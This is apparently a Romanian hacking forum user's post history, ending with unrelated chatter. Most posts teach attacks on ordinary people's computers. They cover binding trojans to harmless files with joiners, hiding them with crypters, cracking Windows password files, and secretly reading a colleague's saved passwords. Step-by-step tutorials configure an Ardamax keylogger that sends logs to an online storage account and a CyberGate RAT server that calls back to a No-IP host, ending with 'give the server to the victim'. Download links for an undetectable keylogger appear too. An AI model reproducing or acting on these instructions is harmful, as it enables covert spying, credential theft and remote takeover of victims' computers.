sunt XSS. Pentru a gasi gaurile de securitate, se folosesc scanerele securiatii. Cele mai bune la moment sunt XSpider si Shadow Security Scanner. Pe siteul nostru puteti sa faceti cunostinta mai bine cu vulnerabilitatile XSS. [color="#FF0000"][b]Joiner [/b][/color] Din engleza, join inseamna a uni, a conecta. Joinerul este o programa care da posibilitatea de a uni sau a incleia mai multe fileuri intr-un singur file sis a-I schimbi iconita. Astfel, hackerul folosind joinerul poate sa incleie un server de troian cu un file util sis a-l inmine tintei sale. La rindul sau, tinta cind lanseaza programa care crede ca este utila, se lanseaza automat si troianul¦Prin intermediul joinerului, poti uni intr-un file pina la 255 fileuri!! Joinerul are un minus acesta poate fi detectat de antivirus. Problema se poate rezolva daca cumparati un joiner privat deoarece joinerele publice nu sunt atit de bune! [color="#800080"][b]Mail bomber [/b][/color] Acest tip de programa este pentru a bombarda adresele de e-mail.. adica trimiterea mai multor sute sau chiar mii de scrisori la o adresa postala! Programele mail bomber sunt folosite pe larg de spameri. Astfel, cind trimitem prea multe scrisori (poate sa ajunga la mii si sute de mii!), posta tintei nu poate sa prelucreze informatia venita brusc si in cantitati mari, astfel, apare eroare de lucru sau chiar se sterge aceasta adresa. Eu personal sunt contra spamerilor! Dar daca veti avea mare nevoie, puteti folosi Ganja Spammer sau oricare altul..Doar in cazuri exceptionale!! [color="#008080"][b]Spargerea parolelor Windows [/b][/color] Cred ca cele mai bune programe pentru lucrul cu parolele sunt: PasswordsPro, MD5Inside, PWLInside, SAMInside. Toate aceste programe sunt produse de InsidePro. Dar pentru a invelege mai bine, am sa scriu cite putin despre acestea. SAMInside este o programa pentru a sparge fileurile SAM. In Windows 2k/XP, toate parolele se tin in windows\system32\config, si se cheama SAM si SYSTEM fara extensie. Pentru a le copia ca sa le descifrati, aveti nevoie de dos sau alta.. Pentru a incepe sa le descifrezi, ai nevoie de copiile acestora. Mai departe le deschideti cu SAM Inside, indicate felul descifrarii si asteptati. In curind veti avea parola descifrata! PWL Inside este practice aceeasi programa ca si precedenta, doar ca se foloseste pentru a descifra fileurile de la Windows 95/98, unde parolele se afla in fileurile cu extensia .pwl in directoriul Windows. MD5Inside cu ajutorul ei poti descifra parolele MD5-hash care este folosit in multe sisteme de autorizare. Dupa descifrarea hash poti avea parola data. De exemplu, in forumurile Invision Power Board asemenea hash se contine in cookies. Mai multe despre cookies cititi pe siteul nostru. PasswordsPro Este un instrument foarte puternic pentru lucrul cu parolele. Are toate functiile MD5Inside, genereaza hash, poate vizualiza parolele ce se afla sub stelute ***. Este foarte utila pentru orice hacker!!! [color="#696969"][b]Vizualizarea parolelor [/b][/color] Daca te intereseaza ce parola are colegul tau, este foarte simplu de a afla. Cind sunteti la acesta in ospetie, il trimiteti sa faca o cafea, iar Dvs. in acest timp, scoateti programele care arata toate parolele de la messengere, posta si altele! Credeti ca-I magie? Totul consta in aceea ca pentru mai multa comoditate, sa facut ca dupa autorizarea Dvs. parola se salveaza in browser, icq, messenger sau posta. Aceasta este o vulnerabilitate destul de mare! Exista multe programe ce arata toate tipurile de parole salvate in calculator. Pentru a vizualiza parolele de la Internet Explorer si Outlook Express, se poate folosi programa PSPV. Pentru TheBat TheBat PasswordViewer, pentru ICQ/Trillian/Miranda si altele Advanced Instant Messenger Password Recovery sau AIMPR. Astfel, fara probleme puneti mina pe parole! [color="#DDA0DD"][b]Trojan [/b][/color] Iata ca am si ajuns la ceva mai interesant. Acest tip de programa hack, a fost numita astfel deoarece lucreaza asemeni vestitului cal troian. Odata ajuns in calculatorul tintei, se ascunde acolo si sta cuminte. El nu face absolut nimic daca nu primeste comanda de la creatorul sau(hackerul ce la trimis). Dar el devine teribil atunci cind la acesta incep a veni comenzi de la hacker prin retea (LAN) sau Internet! Acesta poate sa trimita toate parolele Dvs. hackerului daca primeste asa comanda sau sa lucreze cu fileurile tale sau registru. Cred ca idea ai inteles-o, ai posibilitati foarte mari desi toti au diferite posibilitati! Cei mai populari troiani de azi sunt: Pinch, Xinch, a311 si multi altii¦ [color="#006400"][b]KeyLogger[/b] [/color] KeyLogger este un spion de claviatura. Acesta inregistreaza toate apasarile tastaturii si le scrie intr-un file. Cind apare conexiunea cu internetul, acest file se trimite la hacker, sau le salveaza acolo undeva pe hard disk. Este un instrument ideal daca vrei sa stii ce scrie prietena ta prin icq sau messenger. [color="#DDA0DD"][b]Proxy[/b][/color] Daca te ocupi cu ceva nu chiar legal, nu cred ca vrei sa-ti lasi adresa ta ip real.. dupa care pe tine te gasesc foarte usor. Dar cei de facut in asa caz?? Exista asa numitele proxy servere si socks servere. Smecheria este in aceeia ca acest proxy iti schimba ip-ul tau real. Adica, tu te conectezi la acest proxy server, si toate comenzile nu se duc direct la acel site dar mai intii la proxy server, acela indeplineste comanda, si trimite tie doar rezultatul gata! Astfel ,iese ca proxy serverul face lucrul pentru tine, iar tu ramii anonim! De asemenea, daca tie ti-au banat ip adresa, prin prozy intri fara probleme! In general, daca aveti probleme din cauza ip adresei, folositi proxy si totul se rezolva! Programe bune pentru a lucra cu proxy sunt: A4proxy, ProxySwitcher ¦Deasemenea, mai amanuntit puteti citi despre proxy pe siteul nostru!
-
9. Acum ar trebui sa fiti laControl', click in casuta cu 'Send logs every', .ACUM E SETAT sa trimita loguri la fiecare 20 minute. Urmati instructiunile ca in imagine. Intrati pe http://www.drivehq.com/secure/FreeSignup.aspx?from=storage si facetiva cont . La online storage faceti`va un nou folder cu numele logs (aici veti primi toate datele trimise de keylogger) Acum urmati pasii din imagine . La username si password va puneti contul de pe drivehq Acum click test , (ar trebui sa apara asa) 11.La tabul acesta 'Control',debifati 'Enable Screenshots Capturing' si click Next 12. Puteti sa schimbati iconul keyloggerului daca doriti Click 'Next'. 13. Ar trebui sa vedeti asta ust click 'Finish'. 14.Click Finish 15 . Keyloggeru este creat
-
Ardamax Keylogger 2.85 Tutorial I. Get Ardamax 2.85: Download: http://www.ziddu.com/download/10224344/ardamax.rar.html 1. Odata ce la`ti downloadat si instalat , veti observa o icoana mica in taskbar. 2.Click 'Enter registration key...'. 3.Copy/Paste Numele si key`ul din imagine 4.Odata ce ati terminat apasati ok II.Crearea Serverului Keylogger 1. Click 'Remote Installation...', click 'Next' 2.Ar trebui sa vedeti asta 3.Daca vreti sa lipiti keyloggeru de o alta aplicatie sau de un alt fisier aici o puteti face 4. Click 'Additional components' si selectati 'Installation Package Bilder' 5.Ar trebui sa fiti in tabul 'Invisibility', fiti siguri ca totul e bifat si click 'Next'. 6.Ar trebui sa fiti la tabul 'Security', click 'Enable' si puneti o parola .Click next 7.Ar trebui sa fiti la 'Web Update',debifati 'Check for updates' Click 'Next'. 8. Ar trebui sa fiti la tab 'Options', folositi setarile a in imagine.
-
Un trojan este un program mallware creat cu scopul de a stoarce informatii si de a administra calculatorul persoanei posesoare de acesta. In primul rind, acestia se impart in mai multe tipuri: trojan de e-mail, trojan backdoor si trojan de server. Cel de e-mail este invatat sa lucreze cu ajutorul adreselor postale. Majoritatea functiilor acestuia sunt legate de e-mail. Cel de tip back door este un trojan foarte raspindit. Este creat cu scopul de administrare a unui pc, sa fure informatii practic de tip, sa duca un mod de actionare spion si altele. Deobicei, nimerind pe pc-ul dvs. poate sa obtina control total asupra calculatorului, devenind o mina a hackerului in pc-ul dvs. Cel de server este creat pentru actionarea pe un server web. Deobicei poate sa infecteze vizitatorii site-urilor de pe serverul dat, sa fure informatii si sa administreze pe acest server. Un trojan este alcatuit din doua parti: Partea I. Asa numitul builder sau uneori si client. Prin intermediul acesteia, hacker-ul creaza, adica configureaza trojanul pentru al expedia persoanei tinta. Cu ajutorul acestuia, se seteaza optiunile, se lucreaza asupra posibilitatilor si chestiilor ce urmeaza sa fie indeplinite. Dupa configurare, se salveaza si imediat se creaza a doua parte a trojanului. Partea II. Nu este alt ceva decit un mic file numit server. Acesta este rezultatul compilarii si configurarii trojanului prin intermediul clientului (partea I). Deobicei are marimea intre 5-10 kb si 1 mb. Dar pot fi si trojani de marime mai mare si mai mica. Aces file urmeaza de a fi transmis viitoarei persoane tinta. Cum functioneaza un trojan ? Se cunosc o multime enorma de trojani diferiti! Dar majoritatea au multe in comun... Trojanul backdoor are cele mai multe optiuni si cere o configurare mai ampla fata de celelalte tipuri. Odata aflat si lansat pe pc-ul inamicului, automat isi lanseaza si utilizeaza configuratiile date la creare. Toti trojanii de tip backdoor se conecteaza printr-un port anume pe calculatorul atacat. Deobicei este unul standart sau unul indicat la crearea serverului de trojan. Voi enumara citeva din functiile acestuia: 1. Infectarea unui file la nivel de process de sistema. 2. Contopirea cu un file de sistema de importanta maxima. 3. Furtul tuturor tipurilor de informatii si parole posibile. 4. Auto startup. Lansarea odata cu sistema dupa reboot. 5. Lucrul cu registrul de sistema, incluzind creare, editare, stergere, adaugare de parametri. 6. Keylogger sau inregistrea tuturor celor inregistrate in offline. 7. Creare, editare, stergere, mutare a fisierilor si file-urilor in calculator. 8. Schimbarea configuratiei monitorului si mouse-lui. 9. Un sir de lucruri ca deschiderea cd-romului, aprindere caps lock etc.. 10. Autodestrugere. Daca nu mai aveti nevoie de acesta pe caculatorul persoanei infectate, sau oricare alta cauza, puteti comanda autodestrugerea. Acestea sunt putinele functiistandarte a practic tuturor trojanilor. Insa nu uitati ca multi sunt diferiti si deaceea fiecare au ceva aparte si specific numai acestora. Cum ne aparam ? In ziua de azi, hackerii au primit un fel de libertate in internet, s-a marit teatrul actiunilor, internetul creste zi de zi. Dar pentru a incerca sa va aparati mai bine de un atac cu trojan, este necesar sa cunoasteti cum acesta functioneaza, de ce este in stare si ce abilitati are. Noi am incercat sa facem acest lucru putin mai sus... In primul si primul rind, un trojan nu este periculos daca nu are conexiune cu clientul sau adica cu hackerul. Dar sa nu credetii ca nu mai puteti intra in internet numai din cauza ca gazduiti un trojan. In primul rind, instalati un parafoc (firewall). Sa gindim putin logic...Parafocul controleaza toate incercarile de conexiuni in interiorul calculatorului si infara acestuia. Asa cum trojanul are nevoie sa se conecteze cu clientul sau, parafocul este o bariera de nedepasit pentru acesta! Cind va incerca sa faca conectiune cu clientul sau, va fi stopat de parafoc. Acum putem spune ca ne-am debarasat de o jumatate a acestuia. Al doilea lucru pe care trebuie sa-l facem este o scanare completa a calculatorului, folosind un antivirus cu update de baza recent! Dupa ce l-ati gasit, il stergeti cu capul sus si scapati de acesta. Daca antivirusul nu este in stare sa-l stearga, oricum va va indica ceva informatii despe acesta. Avind cel putin denumirea acestuia (trojan), este usor de cautat si de descarcat un removal tool de pe net. Acum veti scapa de acesta 100% Mai sus am scris numai chestii standarte, iar acum voi scrie mai departe despre ceea ce se face in realitate. Sa nu credeti ca ceea ce este scris mai sus nu este adevarat sau alt ceva. Acum vreau sa ne aprofundam in toata invatatura noastra despre trojani, pentru a spori lucrul cu acestia si pentru a intari securizarea personala. Cred ca cu totii stiti ce sunt programurile cryptor si joiner Defapt, un trojan bine configurat nu este deajuns pentru a infaptui un atac incununat cu succes 100% Daca lasam serverul asa, ne incriptat, sunt foarte putine sanse ca persoana ce urmeaza sa fie atacata nu va afla de acest trojan, in cazul cind are un program antivirus. Iar daca vi s-a nimerit un om ce intradevar nu are antivirus, sa stiti ca sunteti norocos, iar el NU Oricum, un atac cu scopul de furt importnat de informatii nu o sa va reuseasca cu una cu doua! Aici veti da de niste oameni destepti, ce nu o sa fie atit de usor de infectat. Pentru aceste scopuri au fost create programele cryptor si joiner. Fara acestea practic nu este posibil un atac reusit asupra unor useri destepti! Dar sa vormbim despre acestea... Un program cryptor are scopul de a ascunde de antivirusi trojanul, virusii, etc. intr-un cuvind, orice program ce este considerat daunator sistemului de operare si calculatorului in general. El adauga un cod ce seamana cu un gunoi virtual care la rindul sau ascunde codul mallware a trojanului spre exemplu. Dar nu toate sunt in stare sa ascunda orice de ochii curiosi a antivirusului. Sunt multe programe cryptor de ordin public si privat. Cele privat sunt mult mai eficiente. Sper ca si singuri ati inteles dece... Joinerul, la riindul sau ajuta intr-o oarecare masura sa ascundeti trojanului dvs. Mai precis....Acesta contopeste pina la aproximativ 200 de file-uri intr-un singur file. Cind acesta se lanseaza, se lanseaza dintr-o data toate programele contopite aici ulterior. Este foarte des folosit de hackeri! Reduce riscul de observare a trojanului de catre antivirus. Deasemenea, are posibilitatea de a schiba iconita la file-ul creat din cele 200 file-uri contopite. Astfel, contopind o imagine cu un server de trojan, si lasind iconita de imagine, putem liber sa-l transmitem persoanei tinte. Acesta la rindul sau, nebanuind ce se afla acolo, lanseama si vizualizeaza imaginea, parca tot asa cum trebuie. Dar stop, pe linga imagine se mai lanseaza si trojanul, fara ca acesta sa mai stie ceva...Uite ca l-a, infectat fara mare problema Ca la sfirsit, pot sa spun ca un trojan bine configurat, trecut printr-un cryptor privat si un joiner bun, este o arma extrem de periculoasa in miinile unui hacker!
-
- 1
-
-
Cu acest gen de program puteti da "kick" (puteti da afara) persoanele de pe yahoo messenger: Download
-
Acest keylogger este facut in vb6 si nu are nevoie de .net framework. In acest moment keylogger-ul este 1/17 indetectabil. Features: -Trimite logurile pe mail -Interval de timp -Erori false -Website banner -Schimbare icon-ului -Adaugarea in start-up -Primirea unui mesaj cand o noua victima este online -Status (Afisarea persoanelor infectate) Download
-
Programele de hack se intalnesc sub diferite moduri, cele mai utilizate fiind: Denial of Service DoS, dupa cum se cunoaste, vine de la Denial of Service. Atacurile Dos-urilor sunt folosite asupra websiteurilor pentru a "pica" site`ul pentru o perioada nelimitata de timp. RAT's RAT vine de la Remote Administration Tool or Remote Access Tool. Aceste programe sunt de obijnuinta folosite pentru a spiona tastatura , pentru a inregistra ecranul victimei , pentru a putea face screenshoturi , si perminte utilizatorului sa poata intra si sa ia control asupra calculatorului victimei . Logurile si screenshoturile sunt trimise mai apoi pe mail sau pe ftp`ul detinatorului Keylogging Keyloggers sunt programe destinate sa se acunda de anti`virusi si de useri calculatorului. Ei "inregistreaza" tot ce se scrie de la tastura si trimit informatiile cate o adresa ftp sau de e`mail . Cu aceste programe se poat fura foarte usor parole de yahoo mail de msn de skype facebook hi5 si multe altele. Sunt similari cu RAT`s dar nu au la fel de mult acces.
-
-File necesare: + http://www.mediafire.com/?mmwwnj5ofzz ( Cybergate 1.02.0 ) + http://www.no-ip.com/downloads.php (No-Ip client ) No-Ip client + hostname 1. Go to http://www.No-ip.com 2. Creati un account . Log in . Apasati add host 3.Numiti hostul cu un nume oarecare (care doriti). De explu pe al meu il voi numi xzxmikedxzx.no-ip.biz. Urmariti aceste setari si apsati Create Host 4. Acum intrati aici - https://www.no-ip.com/downloads.php and download No-IP's Dynamic DNS Update Client, 5. Odata downloadat , Instalatil . Dupa ce a fost instalat, deschideti programul si puneti-va numele si parola de pe no-ip. Ar trebui sa se updateze odata ce ati bifat contul dumneavoastra. 2. Setting Up CyberGate 1. Download CyberGate si deschideti aplicatia . - tp://www.mediafire.com/?mmwwnj5ofzz 2. Click Control Center - Start 3. Click Control Center - Options - Select Listening Ports Si urmati pasii: Am terminat cu setarea Cybergate. -Crearea Serverului Cybergate 1. Click Control Center - Builder - Create Server. Numele hacker Hacker and press Ok. 2. Marcati userul "Hacker" Si apasati Forward 3. Bifati 127.0.0.1 | Port 999 Si apasati delete 5. O sa apara o casuta cu : 127.0.0.1:81. Stegeti tot Si schimbati cu adresa No-ip pe care va-ti facut`o. Sa spunem ca am folosti example.no-ip.biz. Schimbati 127.0.0.1:81 cu example.no-ip.biz:82. AR trebui sa arate asa 6. Acum Schimbati Identification: remote Password: cybergate Cu acestea : Identification: Cyber Password: 123456 7. Duceti-va la urmatorul tab "Installation" 8. Folositi setarile de mai jos: 9. Sariti taburile Message, Keylogger, and Anti Debug. 10. In construire serverului faceti exact aceste setari : Acum dati serverul la victima si distractie placuta
-
stiu ca era un program numit gamma ajuster... si mergea foarte bine la mine...
-
Posibilitatea Adaugarii Unei Imagini De Fundal Pe Google.com
+Hell_Spawn replied to gaby's topic in Google
fi atent sa fii pe google.com nu pe google.ro -
Posibilitatea Adaugarii Unei Imagini De Fundal Pe Google.com
+Hell_Spawn replied to gaby's topic in Google
eu nam asa ceva.. ba da... doar pe firefox... pe opera nu imi merge... -
lasa un id de mess si te ajut eu
-
Achiever: 19 Conqueror: 16 Daredevil: 14 Mastermind: 12 Socialiser: 7 Survivor: 6 Seeker: 6
-
prea tare... steelseries.. cea mai buna firma de altfel
-
Pc Troubleshooting.ro A Implinit 3 Ani ! (Concurs)
+Hell_Spawn replied to gaby's topic in Bug-uri, sugestii & feedback
Multumesc pt acest premiu Sper sa ajungem si la 5 ani de Si .. doresc sa confirm primirea licentei (deci sa nu credeti ca a fost vreo gluma ) -
Pc Troubleshooting.ro A Implinit 3 Ani ! (Concurs)
+Hell_Spawn replied to gaby's topic in Bug-uri, sugestii & feedback
la multi ani tuturor sa stiti ca desi nu mai sunt asea activ nu vam uitat pe niciunu si cu asta ma si inscriu